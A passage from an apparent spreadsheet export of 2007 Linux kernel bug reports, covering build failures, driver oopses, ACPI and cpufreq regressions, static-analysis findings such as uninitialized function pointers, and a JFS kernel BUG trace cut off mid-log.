    <t>As sent to lkml and netdev on 2007/02/07 without any reply: net/ieee80211/ieee80211_crypt_tkip.c outputs tons of these which didn't happen with 2.6.18.2 (only one or two of these after enabling the ipw2200 with the kill switch): TKIP: replay detected: STA=00:0e:2e:94:84:c3 previous TSC 020000000000 received TSC 00000002e560 printk: 19 messages suppressed. TKIP: replay detected: STA=00:0e:2e:94:84:c3 previous TSC 020000000000 received TSC 00000002e574 printk: 19 messages suppressed. TKIP: replay detected: STA=00:0e:2e:94:84:c3 previous TSC 020000000000 received TSC 00000002e588 printk: 18 messages suppressed. TKIP: replay detected: STA=00:0e:2e:94:84:c3 previous TSC 020000000000 received TSC 00000002e59b printk: 19 messages suppressed. TKIP: replay detected: STA=00:0e:2e:94:84:c3 previous TSC 020000000000 received TSC 00000002e5af printk: 19 messages suppressed. TKIP: replay detected: STA=00:0e:2e:94:84:c3 previous TSC 020000000000 received TSC 00000002e5c3 printk: 19 messages suppressed. TKIP: replay detected: STA=00:0e:2e:94:84:c3 previous TSC 020000000000 received TSC 00000002e5d7 printk: 19 messages suppressed. TKIP: replay detected: STA=00:0e:2e:94:84:c3 previous TSC 020000000000 received TSC 00000002e5eb printk: 19 messages suppressed. TKIP: replay detected: STA=00:0e:2e:94:84:c3 previous TSC 020000000000 received TSC 00000002e5ff printk: 16 messages suppressed. TKIP: replay detected: STA=00:0e:2e:94:84:c3 previous TSC 020000000000 received TSC 00000002e612 printk: 17 messages suppressed. TKIP: replay detected: STA=00:0e:2e:94:84:c3 previous TSC 020000000000 received TSC 00000002e626 Note that the AP in question is a LCS-WA5-40 running in WPA/WPA2 mixed mode and that the client in uses: proto=RSN pairwise=CCMP group=TKIP</t>
  </si>
  <si>
    <t>x64_64 uml doesn't build on x86_64 2.6.20.1</t>
  </si>
  <si>
    <t>2007-02-22 10:16 UTC</t>
  </si>
  <si>
    <t>2008-05-14 10:18 UTC</t>
  </si>
  <si>
    <t># make defconfig ARCH=um ... # make ARCH=um scripts/kconfig/conf -s arch/um/Kconfig SYMLINK arch/um/include/sysdep CHK arch/um/include/uml-config.h UPD arch/um/include/uml-config.h CC arch/um/sys-x86_64/user-offsets.s CHK arch/um/include/user_constants.h CHK include/linux/version.h UPD include/linux/version.h CHK include/linux/utsrelease.h UPD include/linux/utsrelease.h SYMLINK include/asm -&gt; include/asm-um CC arch/um/kernel/asm-offsets.s In file included from include/asm/processor.h:9, from include/asm/thread_info.h:11, from include/linux/thread_info.h:21, from include/linux/preempt.h:9, from include/linux/spinlock.h:49, from include/linux/capability.h:45, from include/linux/sched.h:46, from arch/um/include/sysdep/kernel-offsets.h:2, from arch/um/kernel/asm-offsets.c:1: include/linux/string.h:95: warning: conflicting types for built-in function '__builtin_memcmp' GEN include/asm-um/asm-offsets.h CC scripts/mod/empty.o HOSTCC scripts/mod/mk_elfconfig MKELF scripts/mod/elfconfig.h HOSTCC scripts/mod/file2alias.o HOSTCC scripts/mod/modpost.o HOSTCC scripts/mod/sumversion.o HOSTLD scripts/mod/modpost HOSTCC scripts/kallsyms HOSTCC scripts/bin2c CC init/main.o In file included from include/asm/processor.h:9, from include/asm/thread_info.h:11, from include/linux/thread_info.h:21, from include/linux/preempt.h:9, from include/linux/spinlock.h:49, from include/linux/module.h:9, from init/main.c:13: include/linux/string.h:95: warning: conflicting types for built-in function '__builtin_memcmp' In file included from include/linux/proc_fs.h:5, from init/main.c:14: include/linux/fs.h:835: warning: 'struct flock64' declared inside parameter list include/linux/fs.h:835: warning: its scope is only this definition or declaration, which is probably not what you want include/linux/fs.h:837: warning: 'struct flock64' declared inside parameter list In file included from include/asm/pgtable.h:30, from include/linux/mm.h:40, from include/linux/rmap.h:9, from init/main.c:46: include/asm/pgtable-3level.h: In function 'pud_clear': include/asm/pgtable-3level.h:74: warning: implicit declaration of function 'set_64bit' In file included from include/linux/rmap.h:9, from init/main.c:46: include/linux/mm.h: In function 'get_page_unless_zero': include/linux/mm.h:267: error: 'struct cpuinfo_um' has no member named 'x86' make[1]: *** [init/main.o] Error 1 make: *** [init] Error 2</t>
  </si>
  <si>
    <t>2.6.20.1 i386 uml kernel doesn't run on x86_64 2.6.20.1 host</t>
  </si>
  <si>
    <t>2007-02-22 10:24 UTC</t>
  </si>
  <si>
    <t>2008-03-31 07:36 UTC</t>
  </si>
  <si>
    <t># make defconfig ARCH=um SUBARCH=i386 ... # make ARCH=um SUBARCH=i386 ... # /usr/src/linux/vmlinux Here we hang, no output, no progress. Note: an 2.6.20.1 i386 uml kernel built on an i386 2.6.20.1 host which is running fine on the i386 host shows the same symptom on the 2.6.20.1 x86_64 host.</t>
  </si>
  <si>
    <t>Shan</t>
  </si>
  <si>
    <t>bug in Cyclades serial board's get_serial_info( ) function?</t>
  </si>
  <si>
    <t>Linux-2.6.20</t>
  </si>
  <si>
    <t>2007-02-22 18:45 UTC</t>
  </si>
  <si>
    <t>2007-03-05 18:53 UTC</t>
  </si>
  <si>
    <t>Distribution: Linux-2.6.20 Problem Description: get_serial_info function is used to return serial device information to user. Cycladess serial board's get_serial_info( ) implementation seems to forget to assign the `closing_wait' value (parameter for `time to wait before closing') 3487 static int 3488 get_serial_info(struct cyclades_port *info, 3489 struct serial_struct __user * retinfo) 3490 { ... 3496 memset(&amp;tmp, 0, sizeof(tmp)); 3497 tmp.type = info-&gt;type; 3498 tmp.line = info-&gt;line; 3499 tmp.port = info-&gt;card * 0x100 + info-&gt;line - cinfo-&gt;first_line; 3500 tmp.irq = cinfo-&gt;irq; 3501 tmp.flags = info-&gt;flags; 3502 tmp.close_delay = info-&gt;close_delay; 3503 tmp.baud_base = info-&gt;baud; 3504 tmp.custom_divisor = info-&gt;custom_divisor; 3505 tmp.hub6 = 0; /*!!! */ 3506 return copy_to_user(retinfo, &amp;tmp, sizeof(*retinfo)) ? -EFAULT : 0; 3507 } all parameters, except for closing_wait, is returned. Actually, closing_wait is very likely to be non-zero. Therefore, in most cases, what user gets about this type of device's 'time-to-wait-before- closing' parameter would be wrong. I have compared this code with set_serial_info in the same file and many other serial device's get_serial_info (e.g. moxa_get_serial_info(..) in driver/char/moxa.c, get_serial_info in drivers/usb/serial/io_edgeport.c, etc.). It seems that the closing_wait is very likely to be forgotten. Steps to reproduce: got by source code analysis, no test case yet.</t>
  </si>
  <si>
    <t>AE_NOT_FOUND messages</t>
  </si>
  <si>
    <t>2.6.21-rc1 (git head 9654640d0af8f2de40ff3807d3695109d3463f54)</t>
  </si>
  <si>
    <t>2007-02-22 23:33 UTC</t>
  </si>
  <si>
    <t>Thomas Meyer</t>
  </si>
  <si>
    <t>2007-03-14 21:13 UTC</t>
  </si>
  <si>
    <t>Several acpi (error/warning) messages appears in 2.6.21-rc1, that didn't appear in 2.6.20 (before acpi update). (i guess as a result of this messages my kde klaptopdaemon battery icon is gone, but that is maybe an kde problem? I'm not sure about this.) See attachted dmesg and acpidump</t>
  </si>
  <si>
    <t>powernow-k8: MP systems not supported by PSB BIOS structure</t>
  </si>
  <si>
    <t>2007-02-24 03:24 UTC</t>
  </si>
  <si>
    <t>2008-02-02 00:42 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Debian 2.6.18-3-k7 Distribution: Debian Hardware Environment: AMD Athlon(tm) 64 X2 Dual Core Processor 3600+, Asus Board Software Environment: Debian Problem Description: Hi, after replacing the Debian 2.6.18-3-k7 kernel with a self-compiled 2.6.20 the cpu frequenc skaling does not work anymore. The sysfs entries are completely missing and dmesg says powernow-k8: Found 2 AMD Athlon(tm) 64 X2 Dual Core Processor 3600+ processors (version 2.00.00) powernow-k8: MP systems not supported by PSB BIOS structure powernow-k8: MP systems not supported by PSB BIOS structure regards</t>
  </si>
  <si>
    <t>ir-keymaps ir_codes_pinnacle_grey key correctionss</t>
  </si>
  <si>
    <t>v4l-other</t>
  </si>
  <si>
    <t>2007-02-24 08:33 UTC</t>
  </si>
  <si>
    <t>Emil Georgiev</t>
  </si>
  <si>
    <t>2007-03-03 17:57 UTC</t>
  </si>
  <si>
    <t>Ricardo Cerqueira</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: None Distribution: not distribution specific Hardware Environment: Software Environment: Problem Description: Some keys in the description of pinnacle grey remote control in ir-keymaps.c, ir_codes_pinnacle_grey are not well defined by my opinion. There are different keys on the remote with the same code defined. Here are all of them: FULLSCREEN defined as ZOOM 'PREVIOUS CHANNEL' defined as INFO ENTER defined as PAUSE 'PLAY AGAIN' defined as PLAY 'PREVIOUS SONG' defined as REWIND 'NEXT SONG' defined as FORWARD 'RADIO' defined as MEDIA Whatever is the reason for this duplication of the key codes I believe it is wiser to leave the user to decide which keys should have duplicate behavior. Steps to reproduce: Use irw with grey pinnacle remote control to see that there are duplicated codes for thees different keys.</t>
  </si>
  <si>
    <t>Mark Langsdorf</t>
  </si>
  <si>
    <t>ipaq oops on connecting  "Vodafone VPA-II"</t>
  </si>
  <si>
    <t>2.6.21-rc1-git1</t>
  </si>
  <si>
    <t>2007-02-26 22:50 UTC</t>
  </si>
  <si>
    <t>2008-09-23 09:46 UTC</t>
  </si>
  <si>
    <t>2.6.18 does not known VPA-II, 2.6.19-2.6.21 oops Distribution: Gentoo Hardware Environment: AMD Athlon(tm) XP Software Environment: Synce 0.9.1 Problem Description: A2600 kernel: [ 298.707099] Oops: 0002 [#1] A2600 kernel: [ 298.707101] PREEMPT A2600 kernel: [ 298.707144] CPU: 0 A2600 kernel: [ 298.707145] EIP: 0060:[&lt;f93cc9cd&gt;] Tainted: PF VLI A2600 kernel: [ 298.707147] EFLAGS: 00210286 (2.6.21-rc1-git1 #1) A2600 kernel: [ 298.707163] EIP is at ipaq_open+0x1a5/0x2e0 [ipaq] A2600 kernel: [ 298.707166] eax: 00000000 ebx: 00000100 ecx: c18dc120 edx: f2026000 A2600 kernel: [ 298.707170] esi: ee2b8e80 edi: ece833d4 ebp: f21ebc00 esp: ece81e5c A2600 kernel: [ 298.707173] ds: 007b es: 007b fs: 00d8 gs: 0033 ss: 0068 A2600 kernel: [ 298.707176] Process pppd (pid: 11257, ti=ece80000 task=ecfc8050 task.ti=ece80000) A2600 kernel: [ 298.707178] Stack: ecad0400 f22057f8 f0503600 c01f3209 00000000 c01f3a1a ece833c0 ed6d1fa0 A2600 kernel: [ 298.707184] 00000064 f21ebc00 ed6d1fa0 ffffffed ecad0400 f93d6ff1 c01b603d f93dc1c0 A2600 kernel: [ 298.707190] ed6d1460 edb535a0 00000001 00000802 edb535a0 ecad0400 0bc00000 c01f61b0 A2600 kernel: [ 298.707196] Call Trace: A2600 kernel: [ 298.707200] [&lt;c01f3209&gt;] tty_ldisc_enable+0x26/0x28 A2600 kernel: [ 298.707206] [&lt;c01f3a1a&gt;] init_dev+0x3a8/0x4b8 A2600 kernel: [ 298.707213] [&lt;f93d6ff1&gt;] serial_open+0xf7/0x148 [usbserial] A2600 kernel: [ 298.707222] [&lt;c01b603d&gt;] kobject_get+0xf/0x13 A2600 kernel: [ 298.707231] [&lt;c01f61b0&gt;] tty_open+0x16c/0x2ae A2600 kernel: [ 298.707238] [&lt;c01521dc&gt;] chrdev_open+0x160/0x17c A2600 kernel: [ 298.707245] [&lt;c015207c&gt;] chrdev_open+0x0/0x17c A2600 kernel: [ 298.707248] [&lt;c014e46b&gt;] __dentry_open+0xe1/0x197 A2600 kernel: [ 298.707257] [&lt;c014e59b&gt;] nameidata_to_filp+0x24/0x33 A2600 kernel: [ 298.707262] [&lt;c014e5dc&gt;] do_filp_open+0x32/0x39 A2600 kernel: [ 298.707273] [&lt;c014e319&gt;] get_unused_fd+0x4d/0xbe A2600 kernel: [ 298.707279] [&lt;c014e625&gt;] do_sys_open+0x42/0xc3 A2600 kernel: [ 298.707286] [&lt;c014e6df&gt;] sys_open+0x1c/0x1e A2600 kernel: [ 298.707290] [&lt;c0103cda&gt;] sysenter_past_esp+0x5f/0x85 A2600 kernel: [ 298.707302] ======================= A2600 kernel: [ 298.707303] Code: 45 34 0f 84 21 01 00 00 a1 e4 3f 31 c0 ba d0 00 00 00 e8 00 04 d8 c6 85 c0 89 45 44 8b 55 34 75 07 89 d0 e9 fc 00 00 00 8b 45 3c &lt;89&gt; 50 28 8b 45 44 8b 55 4c 89 42 28 8b 45 3c c7 40 30 00 10 00 A2600 kernel: [ 298.707330] EIP: [&lt;f93cc9cd&gt;] ipaq_open+0x1a5/0x2e0 [ipaq] SS:ESP 0068:ece81e5c Steps to reproduce: connect device [ 237.486198] usb 2-3: new full speed USB device using ohci_hcd and address 2 [ 238.553857] usb 2-3: configuration #1 chosen from 1 choice [ 238.696403] usbcore: registered new interface driver usbserial [ 238.696879] drivers/usb/serial/usb-serial.c: USB Serial support registered for generic [ 238.697263] usbcore: registered new interface driver usbserial_generic [ 238.697408] drivers/usb/serial/usb-serial.c: USB Serial Driver core [ 238.699289] drivers/usb/serial/usb-serial.c: USB Serial support registered for PocketPC PDA [ 238.699444] drivers/usb/serial/ipaq.c: USB PocketPC PDA driver v0.5 [ 238.699797] ipaq 2-3:1.0: PocketPC PDA converter detected [ 238.704807] usb 2-3: PocketPC PDA converter now attached to ttyUSB0 [ 238.705001] ipaq 2-3:1.1: PocketPC PDA converter detected [ 238.707520] usbcore: registered new interface driver ipaq [ 238.736393] usbcore: registered new interface driver cdc_ether [ 238.737833] usbcore: registered new interface driver rndis_host synce-serial-config /dev/ttyUSB0 ddcm synce-serial-start -&gt; oops</t>
  </si>
  <si>
    <t>Build failure on SPARC64 in floppy.c (CONFIG_BLK_DEV_FD=y)</t>
  </si>
  <si>
    <t>2.6.21-rc1 (git c68644d)</t>
  </si>
  <si>
    <t>2007-02-27 09:02 UTC</t>
  </si>
  <si>
    <t>2007-03-13 03:39 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20 Distribution: Aurora Corona Hardware Environment: SPARCstation 1+ Software Environment: Problem Description: Build fails with: CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 drivers/built-in.o: In function `floppy_shutdown': floppy.c:(.text+0x33edc): undefined reference to `dma_spin_lock' floppy.c:(.text+0x33f0c): undefined reference to `dma_spin_lock' floppy.c:(.text+0x33f20): undefined reference to `dma_spin_lock' drivers/built-in.o: In function `floppy_interrupt': (.text+0x33fe8): undefined reference to `dma_spin_lock' drivers/built-in.o: In function `floppy_interrupt': (.text+0x33ff4): undefined reference to `dma_spin_lock' drivers/built-in.o:(.text+0x3401c): more undefined references to `dma_spin_lock' follow make: *** [.tmp_vmlinux1] Error 1 Steps to reproduce: Compile kernel ;-)</t>
  </si>
  <si>
    <t>Possible use-after-free error in ide-probe.c</t>
  </si>
  <si>
    <t>2007-02-27 10:06 UTC</t>
  </si>
  <si>
    <t>Hendrik</t>
  </si>
  <si>
    <t>2007-06-18 09:03 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: unknown, it occurs in 2.6.0 as well Distribution: static analysis of mainline kernel Hardware Environment: Preprocessed as x86_64, allyesconfig Software Environment: n.a. Problem Description: line 575/577: do_probe may indirectly call kfree(device-&gt;id) via do_probe-&gt; try_to_identify-&gt; actual_try_to_identify-&gt; do_identify line 579 : strstr(drive-&gt;id-&gt;model, "E X A B Y T E N E S T") Steps to reproduce:</t>
  </si>
  <si>
    <t>middle button on usb mouse not working</t>
  </si>
  <si>
    <t>2007-02-27 13:10 UTC</t>
  </si>
  <si>
    <t>2007-03-02 05:22 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20-rc4 Distribution: Ubuntu Hardware Environment: atlon xp1700, usb mouse ID 1267:0210 Logic3 / SpectraVideo plc Software Environment: Problem Description: Using the wheel as a button does not work with kernels after 2.6.20-rc4. The 3rd button has to be emulated pressing bother left and right buttons at the same time. Does not matter if the mouse is connected to a hub or one of the ports on the motherboard. Using git bisect I narrowed the problem down to commit 35068976916fdef82d6e69ef1f8c9a1c47732759 I had been using the master branch with that commit reverted. With the commit reverted the mouse works normally again. lsusb -d 1267:0210 -v Bus 001 Device 003: ID 1267:0210 Logic3 / SpectraVideo plc Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 8 idVendor 0x1267 Logic3 / SpectraVideo plc idProduct 0x0210 bcdDevice 0.01 iManufacturer 0 iProduct 2 PS/2+USB Mouse iSerial 0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 34 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xa0 (Bus Powered) Remote Wakeup MaxPower 100mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 1 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 3 Human Interface Devices bInterfaceSubClass 1 Boot Interface Subclass bInterfaceProtocol 2 Mouse iInterface 0 HID Device Descriptor: bLength 9 bDescriptorType 33 bcdHID 1.00 bCountryCode 0 Not supported bNumDescriptors 1 bDescriptorType 34 Report wDescriptorLength 72 Report Descriptors: ** UNAVAILABLE ** Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0008 1x 8 bytes bInterval 10 Device Status: 0x0000 (Bus Powered)</t>
  </si>
  <si>
    <t>dynticks makes ksoftirqd1 use unreasonable amount of cpu time</t>
  </si>
  <si>
    <t>2.6.21-rc2</t>
  </si>
  <si>
    <t>2007-02-28 09:34 UTC</t>
  </si>
  <si>
    <t>2007-03-25 20:52 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: any kernel without dynticks Distribution: Debian etch with linux-2.6.21-rc{2,1} Hardware Environment: Macbook core2 with bios emulation Software Environment: The problem is obvious when listening to shoutcast stream with kmplayer and artsd via wi-fi with wpa (wpa_supplicant) Problem Description: ksoftirqd1 uses ~30% cpu-time (by top) no other symptoms, while without dyntikcs cpu-load in similar circumstances is negligible. This might be a dynticks feature rather than bug. Steps to reproduce: Just watch the top, if the bug is reproducible, probably just booting should suffice.</t>
  </si>
  <si>
    <t>dev-&gt;header_cache_update has a random value</t>
  </si>
  <si>
    <t>2007-03-01 11:33 UTC</t>
  </si>
  <si>
    <t>Chongfeng Hu</t>
  </si>
  <si>
    <t>2008-09-23 08:38 UTC</t>
  </si>
  <si>
    <t>Distribution: Kernel 2.6.20 Problem Description: In struct net_device, there are two fields: hard_header_cache and header_cache_update, both of which are function pointers. The third field, hard_header, is also a function pointer. Whenever hard_header points to a valid function, both hard_header_cache and header_cache_update should have a known value, either NULL or a valid function pointer. However, in drivers/net/wan/hdlc_cisco.c, in function static int cisco_ioctl(struct net_device *dev, struct ifreq *ifr), where dev-&gt;hard_header is assigned a valid function, and dev-&gt;hard_header_cache is assigned a known value (NULL), dev- &gt;header_cache_update is not set to a known value: dev-&gt;hard_start_xmit = hdlc-&gt;xmit; dev-&gt;hard_header = cisco_hard_header; dev-&gt;hard_header_cache = NULL; dev-&gt;type = ARPHRD_CISCO; dev-&gt;flags = IFF_POINTOPOINT | IFF_NOARP; dev-&gt;addr_len = 0; This may cause serious problems when dev-&gt;header_cache_update is invoked, because it has an uninitialized value. Steps to reproduce: I found this suspicious spot with the help of a code-checking tool.</t>
  </si>
  <si>
    <t>(patch queued) mtd-&gt;erase not initialized</t>
  </si>
  <si>
    <t>2007-03-01 15:35 UTC</t>
  </si>
  <si>
    <t>2009-03-17 09:14 UTC</t>
  </si>
  <si>
    <t>Distribution: kernel 2.6.20 Problem Description: In struct mtd_info, which is defined in include/linux/mtd/mtd.h, there are three function pointers: read, write and erase, all these are operations supported to access a flash memory. In almost all the places, where read and write are assigned a valid value, erase is also assigned a valid value, because they are three parallel operations. However, in drivers/mtd/chips/map_rom.c, in function static struct mtd_info *map_rom_probe(struct map_info *map), erase is not initialized. The code is as follows: map-&gt;fldrv = &amp;maprom_chipdrv; mtd-&gt;priv = map; mtd-&gt;name = map-&gt;name; mtd-&gt;type = MTD_ROM; mtd-&gt;size = map-&gt;size; mtd-&gt;read = maprom_read; mtd-&gt;write = maprom_write; mtd-&gt;sync = maprom_nop; mtd-&gt;flags = MTD_CAP_ROM; mtd-&gt;erasesize = map-&gt;size; mtd-&gt;writesize = 1; We notice that in this file, there's no maprom_erase function definition, this may indicate that erase operation is not applicable for this particular device, although erasesize is initialized. But even if this is true, we still need to initialize mtd-&gt;erase to maprom_nop, as we did with mtd-&gt;sync, otherwise when mtd-&gt;erase is carelessly invoked somewhere, it will crash the program. Steps to reproduce: I found this suspicous spot with the help of a code-checking tool.</t>
  </si>
  <si>
    <t>insanely high temperature on bootup (e.g. 3517 C) - HP/Compaq nx8220, nc6000, nc8000 - 2.6.19 regression</t>
  </si>
  <si>
    <t>2007-03-02 04:34 UTC</t>
  </si>
  <si>
    <t>Martin</t>
  </si>
  <si>
    <t>2008-10-17 21:40 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.18.2 Distribution: Debian/SID Hardware Environment: HP/Compaq nx8220 (and nc6000, nc8000) Software Environment: Problem Description: Since I'm using kernel 2.6.20, on some fresh start-ups ACPI reports insanely high temperatures of some thousand degrees C for thermal zone TZ3. I don't exactly know what this sensor does - TZ1 is CPU temperature, TZ2 graphics chip, TZ4 shows speed of CPU fan in % - I guess TZ3 shows some kind of case temperature. Normal values for TZ3 are about 32C. Another user on some forum has the same problem using a nc6000, yet another one uses a nc8000 and kernel 2.6.19 (which I personally never installed/used). So I guess the problem began with 2.6.19. As I'm using powersaved, the system immediately shuts down on boot time, when powersaved starts. Messages in syslog are sth. like: ACPI: Critical trip point Critical temperature reached (3264 C), shutting down. The temperature shown is always different, mostly around 3000C. A new startup after this shutdown (booting the same kernel) leads to the same situation, until I: - boot with acpi=off - only resolves the issue for that boot up - OR boot older kernel 2.6.18.2 - after that you can reboot into 2.6.20 w/o the problem - OR remove AC and battery and plug it in again Steps to reproduce: issue happens sporadically on "fresh" power-on - no way to reproduce it, yet...</t>
  </si>
  <si>
    <t>Ian Walker</t>
  </si>
  <si>
    <t>ivtv (tvaudio?) config option needs CONFIG_VIDEO_V4L1_COMPAT</t>
  </si>
  <si>
    <t>2.6.21-rc2-mm1</t>
  </si>
  <si>
    <t>2007-03-03 01:26 UTC</t>
  </si>
  <si>
    <t>2007-03-03 04:56 UTC</t>
  </si>
  <si>
    <t>Hans Verkuil</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: N/A, newly merged driver Distribution: Fedora Devel Problem Description: ivtv pulls in tvaudio that won't build unless CONFIG_VIDEO_V4L1_COMPAT is selected, but the config system forgets to set it when CONFIG_VIDEO_IVTV is set Steps to reproduce: unselect every V4L option except those required to allow selecting CONFIG_VIDEO_IVTV, and try to build the result</t>
  </si>
  <si>
    <t>ivtv does not autoselect cx2584x, which is needed by pvr150</t>
  </si>
  <si>
    <t>2007-03-03 01:30 UTC</t>
  </si>
  <si>
    <t>2007-03-03 04:55 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: N/A, newly merged driver Distribution: Fedora Devel Hardware Environment: Hauppauge computer works Inc. WinTV PVR 150 on Giga-byte Technology GA-K8N Ultra-9 Mainboard Software Environment: ivtv 0.10.1 userspace Problem Description: With the attached kernel config ivtv builds but does not work</t>
  </si>
  <si>
    <t>lockdep does not like ivtv</t>
  </si>
  <si>
    <t>2007-03-03 03:18 UTC</t>
  </si>
  <si>
    <t>2007-03-10 16:05 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: N/A, newly merged driver Distribution: Fedora Devel Hardware Environment: Hauppauge computer works Inc. WinTV PVR 150 on Giga-byte Technology GA-K8N Ultra-9 Mainboard Software Environment: ivtv 0.10.1 userspace Problem Description: INFO: trying to register non-static key. the code is fine but needs lockdep annotation. turning off the locking correctness validator. Call Trace: &lt;IRQ&gt; [&lt;ffffffff8028b027&gt;] __lock_acquire+0x13d/0xa1c [&lt;ffffffff8028bcb7&gt;] lock_acquire+0x48/0x61 [&lt;ffffffff880f6035&gt;] :ivtv:ivtv_irq_handler+0x1d/0xc34 [&lt;ffffffff80258dc3&gt;] _spin_lock+0x1e/0x27 [&lt;ffffffff880f6035&gt;] :ivtv:ivtv_irq_handler+0x1d/0xc34 [&lt;ffffffff8020ebda&gt;] handle_IRQ_event+0x1e/0x4c [&lt;ffffffff8029bfac&gt;] handle_fasteoi_irq+0x9a/0xd9 [&lt;ffffffff80260b8b&gt;] do_IRQ+0xf4/0x162 [&lt;ffffffff8025f4ec&gt;] default_idle+0x0/0x3d [&lt;ffffffff80253751&gt;] ret_from_intr+0x0/0xa &lt;EOI&gt; [&lt;ffffffff80255fc0&gt;] __sched_text_start+0x170/0x925 [&lt;ffffffff8025f515&gt;] default_idle+0x29/0x3d [&lt;ffffffff80241b1d&gt;] cpu_idle+0x52/0x71 Steps to reproduce: Use ivtv on a lockdep-enabled kernel</t>
  </si>
  <si>
    <t>Regression: A7M266-D board chipset 760MPX AGP not detected</t>
  </si>
  <si>
    <t>2007-03-04 00:11 UTC</t>
  </si>
  <si>
    <t>2007-11-16 09:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Unknown yet, further debugging to confirm. Distribution: Debian Unstable Hardware Environment: A7M266-D 760MPX chipset This is a placeholder bug. I will install 2.6.21-rcX on the box and verify if this resolved via other changes in subsystem.</t>
  </si>
  <si>
    <t>Bug in 2.6.21-rc2-git3</t>
  </si>
  <si>
    <t>2.6.21-rc2-git3</t>
  </si>
  <si>
    <t>2007-03-04 21:05 UTC</t>
  </si>
  <si>
    <t>Will Trives</t>
  </si>
  <si>
    <t>2007-03-07 08:19 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20.1 Distribution: Debian "Etch" 4.0 Hardware Environment: Asus P5B, Core2 Duo System Software Environment: Problem Description: Kernel bug, crashes Steps to reproduce: Start a download in KTorrent, it is reproducable. Hello, It doesn't crash outright but this message pops up and then it slowly grinds to a halt. I've attached config and dmesg output. Asus P5B (intel 965) Core 2 Duo System. Stable on 2.6.20.1. I use JFS for all my disks. Starting a download in KTorrent is what seems to cause it. I'm unsure if this is JFS only related, but didn't know where else to put it. Mar 5 14:51:57 disher kernel: ------------[ cut here ]------------ Mar 5 14:51:57 disher kernel: kernel BUG at fs/mpage.c:535! Mar 5 14:51:57 disher kernel: invalid opcode: 0000 [#1] Mar 5 14:51:57 disher kernel: SMP Mar 5 14:51:57 disher kernel: Modules linked in: af_packet ipt_LOG xt_tcpudp xt_state ppp_synctty iptable_nat nf_nat nf_conntrack_ipv4 iptable_filter ip_tables x_tables ppp_async crc_ccitt w83627ehf hwmon i2c_isa eeprom loop usbhid hid snd_hda_intel snd_hda_codec snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd sg soundcore 8139too intel_agp i2c_i801 psmouse sr_mod snd_page_alloc ehci_hcd e1000 uhci_hcd agpgart usbcore rtc i2c_core cdrom Mar 5 14:51:57 disher kernel: CPU: 1 Mar 5 14:51:57 disher kernel: EIP: 0060:[&lt;c0174733&gt;] Not tainted VLI Mar 5 14:51:57 disher kernel: EFLAGS: 00010246 (2.6.21-rc2-git3 #1) Mar 5 14:51:57 disher kernel: EIP is at __mpage_writepage+0x13a/0x48c Mar 5 14:51:57 disher kernel: eax: 72010021 ebx: c1e6b4c0 ecx: 00000000 edx: 00000000 Mar 5 14:51:57 disher kernel: esi: c1e6b4c0 edi: 00000000 ebp: f721de6c esp: c2273db8 Mar 5 14:51:57 disher kernel: ds: 007b es: 007b fs: 00d8 gs: 0000 ss: 0068 Mar 5 14:51:57 disher kernel: Process pdflush (pid: 192, ti=c2272000 task=c2258ab0 task.ti=c2272000) Mar 5 14:51:57 disher kernel: Stack: c01932f3 c019f852 c2273eac c0189266 00000000 0000000c f721df10 00000001 Mar 5 14:51:57 disher kernel: f5de4000 00000080 00000001 00000000 f88e1990 00001f03 00000000 c2273e98 Mar 5 14:51:57 disher kernel: 0000003f 00000001 00000001 00000000 00000000 c2273e98 0000000e 00000000 Mar 5 14:51:57 disher kernel: Call Trace: Mar 5 14:51:57 disher kernel: [&lt;c01932f3&gt;] diWrite+0x4ab/0x4b5 Mar 5 14:51:57 disher kernel: [&lt;c019f852&gt;] lmWriteRecord+0x277/0x313 Mar 5 14:51:57 disher kernel: [&lt;c0189266&gt;] jfs_get_block+0x0/0x26f Mar 5 14:51:57 disher kernel: [&lt;c013b778&gt;] find_get_pages_tag+0x38/0x77 Mar 5 14:51:57 disher kernel: [&lt;c0175239&gt;] mpage_writepages+0x1e2/0x30b Mar 5 14:51:57 disher kernel: [&lt;c0188ecc&gt;] jfs_writepage+0x0/0xc Mar 5 14:51:57 disher kernel: [&lt;c0189266&gt;] jfs_get_block+0x0/0x26f Mar 5 14:51:57 disher kernel: [&lt;c01118de&gt;] __wake_up+0x32/0x43 Mar 5 14:51:57 disher kernel: [&lt;c01a2646&gt;] txEnd+0x56/0x11d Mar 5 14:51:57 disher kernel: [&lt;c0188eb6&gt;] jfs_writepages+0x0/0xa Mar 5 14:51:57 disher kernel: [&lt;c01404cf&gt;] do_writepages+0x20/0x30 Mar 5 14:51:57 disher kernel: [&lt;c016b8e5&gt;] __writeback_single_inode+0x198/0x308 Mar 5 14:51:57 disher kernel: [&lt;c016bd30&gt;] sync_sb_inodes+0x168/0x211 Mar 5 14:51:57 disher kernel: [&lt;c016c0fe&gt;] writeback_inodes+0x63/0xa5 Mar 5 14:51:57 disher kernel: [&lt;c0140936&gt;] wb_kupdate+0x7b/0xdf Mar 5 